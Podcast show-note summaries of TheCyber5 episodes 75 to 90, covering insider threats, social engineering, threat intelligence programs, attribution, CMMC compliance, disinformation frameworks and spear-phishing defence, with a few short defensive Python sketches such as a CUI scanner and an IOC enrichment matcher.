The Cyber5 is hosted by Landon Winkelvoss, Co-Founder at Nisos. In each episode, cybersecurity and investigations industry leaders answer five questions on one topic related to actionable intelligence for the enterprise, including third-party risk.
In Episode 90 of TheCyber5, we are joined by Peter Warmka, founder of the Counterintelligence Institute. Warmka is a retired senior intelligence officer with the U.S. Central Intelligence Agency (CIA), where he specialized in clandestine HUMINT (human intelligence) collection. With more than 20 years of breaching security overseas for a living, Warmka now teaches individuals and businesses the strategy and tactics of “human hacking.” He highlights how insiders are targeted, the methods nation states use to commit crimes, and where organizations should focus their security training to prevent a breach. Below are the three major takeaways:

1) Prevalent open source techniques for targeting a person or company as an insider threat
A website that lists an organization's key personnel and mission statement provides critical context for targeting employees with social engineering. Job descriptions reveal the enterprise and security technologies in use, allowing bad actors to target potential technology vulnerabilities and subsequently penetrate the organization. Lastly, social media and other open source content typically expose information about employees and companies that can be used for nefarious purposes.

2) Employees are recruited for nation state espionage or crime
Adversaries pose as executive recruiters, both through direct engagement and through hiring platforms, to elicit sensitive company information. Employees allow themselves to be socially engineered by a spearphish. Threat actors will even create deep fakes to sell the impression that they are a senior company executive.

3) Security awareness training should focus on verification
There are several ways to defend yourself and your enterprise, but consistent education and training remain the tried and true defense. Annual security training videos, however, will not change employee behavior; they are too infrequent. Employees need to be taught to be apprehensive about unsolicited outreach by email, phone, social media, or SMS. Business procedures need to focus on quick and timely verification of suspicious activity; a policy of “trust but verify” is likely going to be too late.
In Episode 89 of TheCyber5, we are joined by Nisos Research Principal Vincas Ciziunas. Seven years ago, at a restaurant in Ashburn, Virginia, Nisos co-founders Justin Zeefe and Landon Winkelvoss met Vincas. At the time, Vincas was working as a contractor for the US government but was considering a pivot to the private sector. His impressive intellect, strategic thinking, and technical capabilities made him the ideal intelligence operator to depend on for the launch of Nisos. Over the course of several years, his experience as a developer, open source threat intelligence analyst, hacker, and threat detection and threat hunting expert would prove crucial to solving some of the most complex challenges Nisos' clients brought to us. Once just a trio, the team now known as the Nisos Dogpile huddles together to solve the most intractable cyber, physical, and fraud threats faced by enterprises. In this episode, Landon and Vincas recount some of their most memorable (anonymized) investigations. These stories helped put Nisos on the map and range from Nisos' core capabilities of open source and threat intelligence, direct threat actor engagement, and technical signature analysis against cyber threat actors, to validating physical security threats, trust and safety issues, and insider threats. Make sure to follow Vincas on LinkedIn for more insights and commentary on the world of Managed Intelligence™.
In Episode 88 of TheCyber5, we are joined by Nisos Senior Director for Customer Success, Brandon Kappus. Here are five topics we discuss in this episode:

1) Intelligence Playbooks Start with Education for the Customer
Playbooks should include three major steps. The first is educating the customer on how intelligence will be consumed so that it does not become nonstop noise. Discussions between customers and vendors should start with the requirements customers are trying to address with business stakeholders.

2) Understanding Commercially and Publicly Available Data to Avoid Noise
The next step in any playbook is determining what data is needed to cover unique intelligence requirements. Social media, passive DNS, foreign media, business entity, person, and netflow datasets are all available, but they are meaningless without understanding what a security team is trying to accomplish.

3) Flexibility is Critical to Meet Compliance Regulations
A threat intelligence program by itself is generally not a compliance requirement the way anti-virus or a DLP program is. However, many aspects of a threat intelligence program align with compliance spending, such as monitoring third parties, managing vulnerabilities, tracking credential and data leaks, and mitigating insider threats. Flexibility to adapt to compliance needs is critical for maintaining the program and is as important as addressing routine vulnerability disclosures for the SOC or giving business units a competitive advantage.

4) Intelligence Backgrounds are Useful for Building Great Threat Intelligence Programs
Two backgrounds are common among those building intelligence programs: US government intelligence community experience and data engineering. While data engineering is important for automation and bringing indicators into network defense tooling like a SIEM, intelligence community backgrounds are critical for building relationships and crafting winning value propositions across a stakeholder community. Asking the question, “what does success look like for you?” goes a long way between customers and vendors, particularly when a program is starting.

5) Return on Investment Criteria
When an intelligence program is starting, requirements are collected and the necessary data is purchased, and return on investment often comes in the form of storytelling, for example, sharing how you stopped stolen credentials from being used or an insider threat from leaking data. Over time these stories become common themes that can be built out at scale and ultimately used to capture “prevention dollars” and prevent potential dollar loss from leaving the company. This storytelling tied to dollar loss should be the pinnacle of threat intelligence program maturation.
In Episode 87 of TheCyber5, we are joined by senior information security leader Charles Garzoni. Here are five topics we discuss in this episode:

1) Defining When Attribution is Relevant and Necessary
Many corporations are not overly concerned with attribution of cyber adversaries; they just want to get back to business operations. However, if someone robbed your house, you would want to know whether it was a random drive-by or your neighbor, because the answer informs your defenses much more appropriately.

2) Defending Against Nation States Versus Crime Groups
The ability to distinguish between crime groups and nation states has large implications for defense posture. First, organizations need to conduct a victimology assessment against themselves to determine what actors would want to steal from them. Second, they should list the priority threat actors targeting their sector and intellectual property. Third, they should produce customized detections and prioritized alerts as the resulting output.

3) The Human Element of Attribution
Engaging directly with threat actors (a different kind of human intelligence, or HUMINT) is critical to understanding the human element of attribution, such as motivation, TTPs, and intent. For ransomware actors, for example, understanding their past actions informs future recovery and negotiation efforts. Organizations cannot do this without attribution. For nation states, geopolitical context is critical to understanding security incidents, not to mention the “how” and “why” of their movement in your network.

4) Public Disclosures of Nation State Adversaries Are Effective
Public disclosures and indictments are effective disruption efforts, depending on the nation state. For example, demarche and indictment efforts against China put them on their heels and have a debilitating effect because of how they want to be seen in the world. Russian state operators, however, treat disclosures as a badge of honor. Disclosures by private sector companies can have just as much impact if the goal is disruption.

5) False Flag Operations
While it is easy to say you are someone else, it is challenging to look like someone else. Adversaries think masking their infrastructure to look like another adversary makes attribution difficult. Fortunately for analysts, it is very hard to mimic another adversary's TTPs exactly, which makes attribution easier for defenders. Adversaries would need to study how the TTP implementation works, and they typically don't. For example, when North Korea attacked Sony in 2014, their actions mimicked their earlier attack against South Korean banks in 2013, which made attribution straightforward. While they tried to improve and encrypt their command and control in the Sony attack, the session logs between the two attacks looked almost identical.
In Episode 86 of TheCyber5, we are joined by Chris Cottrell, Senior Manager of Threat Management for Nvidia. Here are six topics we discuss in this episode:

1) What is a threat management department within enterprise security?
Threat management departments are usually formed when security teams mature and have table stakes functions in threat intelligence, red teaming, penetration testing, and threat hunting. These functions are usually formed after compliance, risk, governance, vulnerability management, and the security operations center (SOC) are operational. Unfortunately, “threat management” is not a well-defined term in the enterprise; “threat hunting” in one organization could mean a SOC escalating alerts in another.

2) Incident Response's Role in Threat Management
Incident response is usually a capability separate from threat management (red team, threat hunting, threat intelligence) and from the governance, risk, and compliance (GRC) roles. Incident response is a reactive capability that can find an actor inside the environment, whereas the SOC is the first reactive capability to stop an attacker at the perimeter. Threat management is still considered a proactive capability to keep attackers out at the perimeter.

3) Defining the Roles within Threat Management
- Threat Hunt: Expert-level investigators who know how to review network telemetry with a variety of tools and alerts, find anomalies, and investigate whether an adversary is inside the environment. They usually take their cues from incident response, the red team, or threat intelligence.
- Threat Intelligence: Expert-level analysts and engineers who review the types of threats that could attack an organization and develop alerts and playbooks for threat hunters. They take on many other roles depending on the business.
- Red Team: Penetration testers who emulate or simulate adversaries within the environment to determine what alerts should be created and prioritized.

4) Threat Intelligence Must Start with Business Requirements
Threat intelligence is meaningless and lacks context until analysts understand how the business makes money and the corresponding risks that could disrupt it. Building a threat intelligence program from scratch can take up to a year, and the first six months will be spent building relationships with the business before any feeds can be incorporated.

5) Stories are the Best Metrics for Threat Intelligence Programs
Mean time to respond and mean time to alert are table stakes metrics for the SOC but are outside the control of the threat management team (red team, threat intel, etc.). Better metrics for threat intelligence teams are the success stories in which information was actioned by a business unit and risk was averted.

6) Reactive Capabilities When an Incident Occurs
The threat management department becomes critical during a security incident. Red teamers have the mindset to look for mistakes in a vulnerability or network defense; threat hunters have the mindset to look for mistakes by adversaries. The same mindsets are critical to investigating security events and incidents with the incident response team. Threat intelligence can conduct external threat hunting outside the firewall when an incident occurs.
In Episode 85 of TheCyber5, we are joined by Dr. George Shea, Chief Technologist of the Transformative Cyber Innovation Lab at the Foundation for Defense of Democracies (FDD). Here are four topics we discuss in this episode:

1) What is the Operational Resiliency Framework (ORF)?
The Operational Resiliency Framework (ORF) is intended to be used by executives to ensure business continuity when their suppliers are knocked offline by natural disasters or cyber attacks.

2) Defining Minimum Viable Services
Step one, and the most important step, is defining a minimum level of service for all products and services. When disasters or cyber attacks occur, the minimum viable service reveals the critical suppliers that need extra attention from a redundancy and monitoring perspective.

3) Resilience is Not Going to Stop a Cyber Attack
The ORF is not a compliance requirement, nor will it stop a cyber attack. It is designed to help organizations respond while an attack is ongoing. For example, if an attacker is already in the system, it is important to keep valuable services running and ensure the suppliers that enable those critical services don't go down. The framework extends beyond your perimeter to suppliers and customers.

4) Cyber Configurations Are Critical
While this is not a cybersecurity framework, technical controls and configurations at the suppliers are an important part of keeping minimum viable services up and running.
In Episode 84 of TheCyber5, we are joined by members of the CrossCountry Consulting team: Brian Chamberlain, Offensive R&D Lead; Eric Eames, Associate Director; and Gary Barnabo, Director, Cyber and Privacy. Here are five topics we discuss in this episode:

1) Adversary Emulation vs. Simulation and the Use of Threat Intelligence
Replaying attacks from known adversaries is adversary emulation. The pro of emulation is that you can defend against threat intelligence and the actual techniques during a penetration test; the con is that these are often yesterday's threats. Simulation is the art of coming up with new attack vectors with nuanced penetration testers. The pro is that these attacks give blue teams new ways to think ahead and adapt their defenses before threat actors do; the con is that these attacks are not yet in the wild and their probability is not known.

2) The Value of Threat Intelligence to Red Teams
Indicators of compromise (IOCs) are immediately relevant and actionable, even though their value is overcome by events (OBE) within hours. IOCs do not capture the heuristics of sophisticated adversaries, and that is what combining sophisticated adversary simulation with threat intelligence attempts to overcome. For example, if an enterprise can defend against malicious HTML Applications (HTAs), that protects it against any adversary using that vector. Another example is a simulated ransomware event, based on threat intelligence, that drops in several places and simulates everything six different ransomware families would do (up until encryption).

3) Tools Are Not Enough
Enterprises struggle when a security product does not catch an actor in the environment and when they do not know how to react in a way that forensically preserves the attacker's initial access vector. Training incident response and conducting external threat hunting are critical to defending and reacting when an attacker creates a new way to penetrate an environment.

4) Satisfying a Chief Financial Officer's Appetite for Security
In today's information technology environments, CFOs need to be conversant in cybersecurity, not experts. Some considerations:
- CFOs should hold security tooling accountable, because there is an overconsumption of tooling that simply does not make an impact. Further, corporate development, merger and acquisition strategy, and payments to vendors are critical business functions a CFO should be concerned with protecting.
- A CFO should be empowered to initiate a penetration test unbeknownst to the security team. Adversary simulations are often highly political as a result, but this kind of dialogue is beneficial for incident response preparation and for threat intelligence on how to defend against certain threat actors.
- If a company is in growth mode with over $1B in annual revenue, and IT cannot integrate acquisitions quickly enough, more should be spent on security. If a company is in profitability mode, streamlining security is probably more important. For companies under $1B in annual revenue, spending on security is always challenging, and managed services and consulting come more into play.

5) Benchmarks Can Be Challenging
Many companies want benchmarks on how they stack up against industry peers. Every company is different and no two environments are the same, so stacking up against industry measures like third-party risk “scores” is challenging and not advisable.
Data Governance and Threat Intelligence Converge
In Episode 83 of TheCyber5, we are joined by Egnyte's Chief Governance Officer, Jeff Sizemore. We discuss the Cybersecurity Maturity Model Certification (CMMC) and its impact on Department of Defense (DOD) contractors, which must mature their cybersecurity hygiene in order to compete for US government contracts. CMMC is based on NIST SP 800-171. Here are four topics we discuss in this episode:

1) Why Does CMMC Matter?
In the near future, contracts will be rated Level 1-3, and contractors that are not certified to the required level cannot bid on them. This is aimed especially at smaller defense contractors who, up to now, have generally disregarded compliance measures yet are major targets for nation state cyber attacks.

2) Failure to Comply with CMMC Could Mean Perjury
Compliance for DOD contractors is not new, and companies were previously allowed to self-attest. When DOD regulatory bodies did the research, 75% of companies were found not to be in compliance. For enforcement, the Department of Justice is now involved, and if contractors lie, it is considered perjury.

3) Compliance Cybersecurity Controls Contractors Can Implement
Before choosing an email provider, cloud environment, or file share, be sure they are FedRAMP compliant. Automate the search capability within secure enclaves so CUI (controlled unclassified information) is detected in the environment (a small sketch of automating this search follows this summary). Automate the ability to be audited so contractors aren't wasting time in spreadsheets.

4) Incident Response and Threat Intelligence Controls Needed
Threat intelligence is still evolving as a way for larger contractors to monitor their subcontractors for vulnerabilities and breaches. Third-party risk scorecards are generally not actionable for defense contractors because the vulnerabilities are not put into the context of a business risk. The key is to bring together a threat intelligence picture that can alert on actionable data leaks.
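As a minimal illustration of the "automate the search for CUI" control above, the sketch below walks a directory and flags files carrying common CUI banner markings. The directory path and marking patterns are assumptions for illustration only, not a compliance-grade scanner.

```python
import re
from pathlib import Path

# Common CUI banner markings (illustrative, not an exhaustive or authoritative list).
CUI_PATTERNS = re.compile(
    r"\b(CUI|CONTROLLED UNCLASSIFIED INFORMATION|CUI//SP-\w+)\b", re.IGNORECASE
)

def scan_for_cui(root: str) -> list[tuple[str, int]]:
    """Return (path, line_number) pairs where a CUI marking appears."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
                if CUI_PATTERNS.search(line):
                    hits.append((str(path), lineno))
        except OSError:
            continue  # unreadable file: skip rather than fail the whole sweep
    return hits

if __name__ == "__main__":
    # "./shared_drive" is a placeholder for the enclave or file share being swept.
    for path, lineno in scan_for_cui("./shared_drive"):
        print(f"possible CUI marking: {path}:{lineno}")
```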
In episode 82 of The Cyber5, we are joined by guest moderator and senior intelligence analyst for Nisos, Valerie Gallimore, and CEO of BGH Security, Tennisha Martin. In this episode, we discuss the challenges and opportunities of promoting and enabling diversity and inclusion in cyber security. Key Takeaways:

1) Showing Impact for Diversity and Inclusion (D&I) within Security
Beyond filling cyber security skills gaps, some metrics that show success in D&I include:
- Jobs
- Feeling more confident in interviews
- Recommending minorities for employment opportunities
- Educating about opportunities outside of technical positions, such as project management, customer success, product management, marketing, and sales
- Certifications
- Transitions to cyber security from other career fields

2) Giving Back to the Cybersecurity Community
- Volunteering to help educate the next generation of ethical hackers and cybersecurity specialists.
- Donating funds to nonprofit organizations that assist people interested in pursuing a career in cybersecurity.
- Volunteering time to instruct courses or sessions that help individuals gain exposure to the cybersecurity sector.

3) Being Part of a Supportive Virtual Community
- Having a community of people you can talk to about issues you encounter in the industry, even if they are not near you.
- Having people you can relate to and reach out to because they are navigating the same path you are.
- Having a psychologically safe space for people to problem solve and brainstorm without feeling judged.
- Helping people who are new to cybersecurity feel comfortable and stay in the industry.
In episode 81 of The Cyber5, we are joined by the Head of Insider Threat at Uber and CEO of Vaillance Group, Shawnee Delaney. In this episode, we provide an overview of the different functions within an insider threat program. We also discuss the support open source intelligence provides to such programs and how to change company culture to care about insider threats. Finally, we discuss the ROI metrics that matter to different stakeholders when implementing an insider threat program. Three Takeaways:

1) Departments and Functions within Insider Threat
Insider threat programs are relatively new in enterprise security and often differ from company to company. Open source intelligence can be a standalone role or be cross-functional across all departments. Common departments and functions include:
- Open source intelligence
- Forensics monitoring
- Training and awareness (steering committees for stakeholders, benchmarking)
- Technical and behavioral monitoring (UEBA or DLP)
- Supplier due diligence
- Global investigations
- Global intelligence analysis

2) Common Problems Faced by Insider Threat Teams
- Privacy, to ensure employee confidentiality is not violated.
- Tooling, to distinguish malicious events from normal behavior.
- Finding practitioners who can do both the technical monitoring and the open source intelligence.
- Shifting culture to be more security conscious.
- Focusing on physical security issues, like active shooter situations, just as much as data exfiltration and other cyber concerns.

3) Role of Open Source Intelligence in Insider Threat Programs
An insider threat program is a key stakeholder for a threat intelligence program, not the individual buyer. Three key areas where open source intelligence (OSINT) supports insider threat programs:
- Employee lifecycle management: ensuring employees, former employees, and prospective hires are not an insider threat based on what they post on the internet.
- Validating red flag indicators with OSINT.
- Investigations into vendors.
In episode 80 of The Cyber5, we are joined by Executive Director of the DISARM Foundation, Jon Brewer. We discuss the mission of the DISARM Framework, a common framework for combating disinformation. Much as the MITRE ATT&CK framework is used for combating cyber attacks, the DISARM framework is used to describe what Jon calls “cognitive security”: all the tactics, techniques, and procedures used in crafting disinformation attacks and influencing someone's mind, including the narratives, accounts, outlets, and technical signatures used to influence a large population. We chat about what success looks like for the foundation and the specific audiences it helps understand how disinformation actors work. Three Takeaways:

1) What is the DISARM Framework?
DISARM is the open-source, master framework for fighting disinformation through the coordination of effective action. It was created by cognitive security expert SJ Terp. It helps communicators, from whichever discipline or sector, gain a clear, shared understanding of disinformation incidents and immediately identify the countermeasure options available to them. It is similar to the MITRE ATT&CK framework, which provides a list of the TTPs malicious actors use to conduct cyber attacks.

2) Similarities Between the DISARM and MITRE ATT&CK Frameworks: Cognitive Security vs. Cyber Security
Cognitive security and the DISARM framework are analogous to cyber security and the MITRE ATT&CK framework. Cognitive security covers the TTPs actors use to influence minds; cyber security covers actors' ability to steal data from networks (a small tagging sketch follows this summary).
MITRE ATT&CK covers the TTPs of the cyber kill chain: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration.
DISARM covers the TTPs of the disinformation chain: Plan Strategy, Plan Objectives, Target Audience Analysis, Develop Narratives, Develop Content, Establish Social Assets, Establish Legitimacy, Microtarget, Select Channels and Affordances, Conduct Pump Priming, Deliver Content, Maximize Exposure, Drive Online Harms, Drive Offline Activity, Persist in Information Environment, Assess Effectiveness.

3) Disinformation: A Whole of Society Problem
MITRE ATT&CK is mostly a business-to-business framework for enterprises defending against cyber attacks. The DISARM framework is a B2B framework for companies in sectors like technology and journalism, but it also applies more broadly to consumers. This will take much more support from nonprofits and public sector organizations like police and education systems.
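To make the analogy concrete, here is a small, hypothetical sketch of how an analyst might tag observations from an influence operation with DISARM-style phase labels, much as a cyber incident gets tagged with ATT&CK tactics. The phase names come from the list above; the incident data is invented for illustration.

```python
from collections import defaultdict

# Observations from a hypothetical influence operation, each tagged with a DISARM phase.
observations = [
    ("Develop Content", "AI-generated articles pushing a false narrative"),
    ("Establish Social Assets", "network of 40 recently created sock-puppet accounts"),
    ("Establish Legitimacy", "spoofed local-news outlet website"),
    ("Deliver Content", "coordinated posting across three platforms"),
    ("Maximize Exposure", "paid amplification via bot retweets"),
]

def coverage_by_phase(obs):
    """Group observations by DISARM phase so gaps in visibility stand out."""
    phases = defaultdict(list)
    for phase, detail in obs:
        phases[phase].append(detail)
    return phases

for phase, details in coverage_by_phase(observations).items():
    print(f"{phase}: {len(details)} observation(s)")
```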
In episode 79 of The Cyber5, we are joined by senior security practitioner Garrett Gross. We discuss the age-old problem of spear phishing and why enterprises still struggle to fix it. We talk about the critical processes and technologies needed to defend against spear phishing, including robust training programs and endpoint detections. We also cover how to use the telemetry collected from spear phishing attempts and integrate it with outside threat intelligence. Five Takeaways:

1) Security Teams Need to Make a Sensor Network from the Employee Base
Attackers win consistently when they get employees to click malicious spear phishing links. They use socially engineered communications, usually over email, that appear legitimate but are designed to trick a user into opening a document or clicking a link that yields sensitive information about the user. Security training is boring, and employees outside of security don't pay attention to annual reminders. Real education must be relatable to employees so that they can identify when a malicious link is deployed against them. The most critical thing a security team can do is build a sensor network out of its employees by spelling out the ripple effects of PII and intellectual property theft after a malicious link is executed.

2) Experts Must Create Critical Processes and Use Technologies to Defend Against Spear Phishing
A closed-door approach to security is not efficient; experts transparently interacting with the employee base is what defends against spear phishing. A phased approach is necessary to assess the required logging in an automated way, as this takes months to configure and alert properly. The building blocks of this approach are:
- An endpoint detection and response (EDR) solution, the most important tool for defending against spear phishing.
- An automated way to report incidents, so users are not waffling on whether to report. It should go without saying, but no one should get in trouble for reporting an incident.

3) Spear Phishing Typically Impersonates Executives; Executives Should Conduct PII Removal and PII Poisoning
The sophistication and reconnaissance of advanced adversaries are challenging to detect, particularly when bad actors impersonate executives. Verifying information over the phone is often needed to circumvent advanced attempts to socially engineer an employee base. Further, publicly available information about executives should be scrubbed and removed from the internet on a routine basis. (A small sketch of flagging external senders and impersonated executives follows this summary.)

4) Use of Spear Phishing Telemetry with Threat Intelligence for Small and Medium-Sized Businesses
Small companies with limited security personnel will be fortunate just to get banners on emails coming from an external source. They will spend a small part of their day conducting internal threat hunting, and they won't be able to conduct external threat hunting to determine the sophistication of a spear phishing campaign. They need to partner with managed intelligence providers to do external threat hunting effectively.

5) “Defensibility” Measures are Critical Success Metrics: Threat Intelligence and Red Teams
Quantified reports and solutions that show how a security team is systematically reducing risks to the business are the only way boards will increase budgets. To prove that various attacks matter to the business, threat intelligence with subsequent red teaming is the primary way to illustrate the issues to an executive team.
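A minimal sketch of the external-sender safeguard described above: it inspects an inbound message's headers, flags mail from outside the corporate domain, and warns when the display name matches an executive while the address does not. The domain and executive list are placeholders, and a real mail gateway would apply far more checks.

```python
from email import message_from_string
from email.utils import parseaddr

CORPORATE_DOMAIN = "example.com"                  # placeholder corporate domain
EXECUTIVE_NAMES = {"jane doe", "john smith"}      # placeholder executive display names

def assess_inbound(raw_message: str) -> list[str]:
    """Return warning banners to prepend to the message before delivery."""
    msg = message_from_string(raw_message)
    display_name, address = parseaddr(msg.get("From", ""))
    warnings = []
    if not address.lower().endswith("@" + CORPORATE_DOMAIN):
        warnings.append("CAUTION: this email originated outside the organization.")
        # Display-name spoofing: looks like an executive, but sent from an external address.
        if display_name.strip().lower() in EXECUTIVE_NAMES:
            warnings.append("WARNING: sender display name matches an executive "
                            "but the address is external. Verify by phone.")
    return warnings

sample = "From: Jane Doe <jane.doe@freemail.example>\nSubject: urgent wire\n\nPlease call me."
print(assess_inbound(sample))
```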
In episode 78 of The Cyber5, we are joined by our guest, Gaurang Shah, former senior lead technology manager at Booz Allen Hamilton. We talk about the challenges of digital transformation and cybersecurity in the US federal government. We discuss solutions for bringing innovative technology and bespoke services into the federal space and how to shorten long procurement cycles. We also cover what the federal government can learn from the private sector, including how to shrink the ongoing cyber skills shortage. Four Takeaways:

1) Federal CISOs and CIOs Think Cloud Migrations Will Bake in Security
Outside of the US national security, intelligence, and DOD sectors, many civilian agency CIOs and CISOs have the following shortcomings with regard to cloud migration. First, they assume security will be baked in as part of cloud migrations to AWS, Azure, or GCP, which is not the reality. Second, cloud implementation covers infrastructure-as-a-service but lags far behind in software-as-a-service and application security. Third, they are either unaware of their expanding attack surface, lack an enterprise security culture, or are unable to gain funding for their security initiatives. Last, they have trouble retaining talent against the private sector.

2) The Build Versus Buy Debate in US Civilian Agencies
Procurement in many civilian agencies within the US federal government is based on the lowest acceptable cost, not necessarily on value delivered. They also cannot hire and retain talent at costs comparable to the private sector, so building technology is extremely challenging. Many civilian organizations aren't doing threat intelligence and incident response at the scale and speed necessary.

3) Approaches for Overcoming the Cyber Skills Shortage
Understanding that the federal government will lose on hiring top talent due to lowest-cost-acceptable restrictions in the procurement cycle, we recommend training IT, enterprise architecture, database administration, and system administration personnel who want to grow into security, particularly in automation.

4) The Future of Outsourcing to Managed Services Experts and Codifying Appropriate Threat Models
Some civilian agencies will likely need to outsource portions of SOC operations to managed services companies over the coming years. Some agencies are outsourcing Level 1 alerting, for example, while keeping Level 2-4 escalations in house. However, for the US federal government as a whole to be successful, there needs to be an agreed-upon risk posture framework that civilian agencies adhere to so that automation in detection and response can be achieved at the scale needed in the federal space. Further, application and software security are way behind; much of the focus is on infrastructure security. Outsourcing is still viewed with reticence in the federal space because of supply chain concerns, but the federal government may have no choice but to implement aspects of a next-generation SOC by outsourcing to experts to a greater degree.
In episode 77 of The Cyber5, we are joined by our guest, Eric Lekus, Senior Manager for Threat Intelligence at Deloitte. Eric delivers for Deloitte's internal security team and is not a client-facing consultant. We talk about how to evolve cyber threat intelligence in a SOC environment beyond basic indicators of compromise (IOC) integration. We discuss the different stakeholders a CTI team has beyond the SOC, but also focus on what a CTI team needs to push to and pull from a SOC to be relevant for a broader audience. We also outline success metrics for a CTI team. Four Takeaways:

1) Indicators of Compromise are a Baseline Activity, Not Holistic Threat Intelligence
Indicators of compromise consist of known malicious IPs and domains. Stakeholders expect security teams to be doing this as a baseline. However, IPs and domains can change in a matter of seconds, so it is not fruitful to rely only on IOCs integrated into a SIEM that alerts alongside other network traffic and logging.

2) A Security Operations Team Already Has a Rich Source of Baseline Activity; Enrich It with Threat Intelligence
Security teams should be integrating many sources of logging, such as IPs from emails, and using threat intelligence to alert on malicious activity. This should establish two-way communication in which the threat intelligence team pulls information from the SOC to enrich it and provide feedback (a small enrichment sketch follows this summary). A SOC team is generally writing tickets for alerts, and a threat intelligence team can't just ask for bulk data; automation to integrate with threat intelligence platforms is therefore critical. A SOC analyst will ask, “what's in it for me?” and a threat intelligence professional should be ready to answer.

3) Threat Intelligence Should be a Separate Entity from the SOC; It Has Numerous Customers
The following services are generally associated with cyber threat intelligence teams. Since the SOC is a major stakeholder, CTI usually has the following functions:
- Adversary infrastructure analysis
- Attribution analysis
- Dark web tracking
- Internal threat hunting
- Threat research for identification and correlation of malicious actors and external datasets
- Intelligence report production
- Intelligence sharing (external to the organization)
- Tracking threat actors' intentions and capabilities
- Malware analysis and reverse engineering
- Vulnerability research and indicator of compromise analysis (enrichment, pivoting, and correlating to historical reporting)

4) Success for Security Teams Means Reducing Risk Through Outcomes
Regardless of who the stakeholders are in an organization, improving security should focus on reducing risk and influencing outcomes that disrupt actors. This should be done in alignment with the executive team and the culture of the organization. Showing how you are reducing risk over time is what makes threat intelligence teams successful in the eyes of business executives.
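A minimal sketch of the two-way enrichment described above, with hypothetical field names: SOC events already parsed from email or proxy logs are checked against a small IOC set, and matches are returned with the intelligence context a ticket would need. In practice the IOC index would be fed from a TIP or feed pipeline rather than hard-coded.

```python
from dataclasses import dataclass

@dataclass
class Ioc:
    value: str        # IP or domain
    actor: str        # attributed actor or campaign, if known
    source: str       # where the indicator came from
    confidence: str   # analyst-assigned confidence

# Tiny illustrative IOC set; values and attributions are invented.
IOC_INDEX = {
    "203.0.113.7": Ioc("203.0.113.7", "hypothetical-crime-group", "vendor feed", "medium"),
    "login-portal.badsite.example": Ioc("login-portal.badsite.example", "unknown", "internal report", "high"),
}

def enrich(events: list[dict]) -> list[dict]:
    """Attach IOC context to SOC events whose source IP or domain matches an indicator."""
    enriched = []
    for event in events:
        for key in ("src_ip", "domain"):
            ioc = IOC_INDEX.get(event.get(key, ""))
            if ioc:
                enriched.append({**event, "ioc_actor": ioc.actor,
                                 "ioc_source": ioc.source, "ioc_confidence": ioc.confidence})
                break  # one enrichment per event is enough for the ticket
    return enriched

events = [{"src_ip": "203.0.113.7", "user": "a.analyst"},
          {"domain": "example.org", "user": "b.builder"}]
print(enrich(events))
```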
In episode 76 of The Cyber5, guest moderator and Nisos Director for Product Marketing, Stephen Helm, is joined by our guest, Dr. Maria Robson, the Program Coordinator for the Intelligence Project of the Belfer Center at Harvard University's Kennedy School. We discuss the evolution of intelligence roles in the enterprise and the career path for intelligence professionals. We cover ethics in private sector intelligence teams and the role of academia in fostering not only the ethics but also the professionalization of private sector intelligence positions. Dr. Robson also discusses how proactive intelligence gathering capabilities tend to provide the most value to the enterprise. Finally, she gives an overview of the work and mission of the Association of International Risk Intelligence Professionals. Three Takeaways:

1) Ethical Focus is Critical
Ethical lines and a standard of what is appropriate for collection and analysis are important but currently very murky. Collection and analysis techniques used by the U.S. Intelligence Community would be entirely inappropriate, and illegal, when collecting against private sector persons and organizations. Standards would ensure, for example, that new analysts know what is in and out of bounds for the type of inquiry they can answer. The Association of International Risk Intelligence Professionals (AIRIP) is leading the way in identifying these standards.

2) An Apprentice and Guild Process is Critical if Standards are Slow to Develop
A craft and guild process matters for getting jobs in private sector intelligence because there is no linear pathway to employment. Since networking and a manager's previous experience in the intelligence community, nonprofits, or the private sector are the driving forces behind mentorship, craft and guild benchmarking and professionalization become important models.

3) Security Organization and Reporting Structures Have Changed
Cyber threat intelligence, geopolitical risk, and corporate security have historically been the core security functions. Before digging into how cyber threat intelligence benefits a physical security program, we identify some of the services, products, and analyses a CTI program might address. The following services have significant overlap with physical security programs:
- Adversary infrastructure analysis
- Attribution analysis
- Dark web tracking
- Internal threat hunting
- Threat research for identification and correlation of malicious actors and external datasets
- Intelligence report production
- Intelligence sharing (external to the organization)
- Tracking threat actors' intentions and capabilities
Other CTI services generally do not overlap with physical security and remain the responsibility of cybersecurity teams: malware analysis and reverse engineering, vulnerability research, and indicator analysis (enrichment, pivoting, and correlating to historical reporting). Security teams are now leveraging open source intelligence and cyber threat intelligence to provide critical information to physical security practitioners. The physical and corporate security programs of these teams generally consist of the following disciplines, with use cases that sit at the center of the convergence of the cyber and physical security disciplines:
- Executive Protection and Physical Asset Protection
- Travel Security
- Regulatory/Environmental Risk Specific to the Business
- Geo-Political Risk
- Supply Chain Risk Management
- Global Investigations
In episode 75 of The Cyber5, we are joined by Grist Mill Exchange CEO Kristin Wood. We discuss open source intelligence (OSINT) use in the U.S. public sector, not only in national security but also in the emergency response sector. We talk about how open source intelligence has evolved in the last ten years and how adversaries use open source intelligence against us. We also discuss how the U.S. needs to catch up, not only in operationalizing OSINT in meaningful ways but also in procuring bleeding edge technologies quickly enough to meet mission requirements. Three Takeaways:

1) Open Source Intelligence Has Evolved From Just Foreign Media; It's the New All-Source Intelligence
The national security sector traditionally used open source intelligence for translating foreign media, particularly during crisis situations. Now, open source intelligence is being leveraged in many of the same ways as all-source intelligence, the integration of human, signals, and imagery intelligence. The interconnectivity of devices has led to a commercial “goldrush” to aggregate data and sell it to public and private sector clients.

2) China is Remarkable at Open Source Intelligence, Using Autocracy as an Advantage
China and Russia are collecting open source intelligence against the U.S. at an unprecedented level, including what is commercially available and what is obtained through computer network exploitation and data exfiltration. They aim to reframe the U.S. using disinformation as a powerful tool, and they have been very successful in leveraging online disinhibition effects against the U.S. populace.

3) The United States Public Sector Needs an Overhaul in Procurement Authority
The U.S. private sector has a lot to teach the public sector about learning consumer behaviors and pairing that with commercially derived data, such as device fingerprinting, to extract valuable insights for national security purposes. To accomplish this, analysts need to be able to circumvent cumbersome government procurement buying cycles.
